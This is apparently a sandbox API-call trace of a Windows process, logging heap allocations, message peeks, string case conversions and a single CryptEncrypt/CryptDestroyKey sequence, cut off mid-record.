[0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.952] CharLowerBuffW (in: lpsz="byte[71016]", cchLength=0xb | out: lpsz="byte[71016]") returned 0xb [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.952] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.953] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.955] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.955] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.955] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.956] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.956] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.956] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0256.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0256.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.956] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.957] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24c8fb8*, pdwDataLen=0x8bef68*=0x11565, dwBufLen=0x11568 | out: pbData=0x24c8fb8*, pdwDataLen=0x8bef68*=0x11568) returned 1 [0256.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0256.958] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0256.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0256.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.959] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.959] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.959] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0256.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0256.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.961] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.961] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.961] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0256.961] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.961] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0256.961] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0256.961] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.962] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0256.962] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.962] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0256.962] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.962] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0256.962] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.962] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.963] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.963] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.963] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0256.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.963] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.963] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.964] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0256.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.970] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.970] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.970] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0256.970] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.970] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0256.971] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.971] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.971] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.971] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.971] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.971] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.972] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.972] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.972] CryptDestroyKey (hKey=0xaa5820) returned 1 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.972] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.973] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.973] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0256.973] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.973] 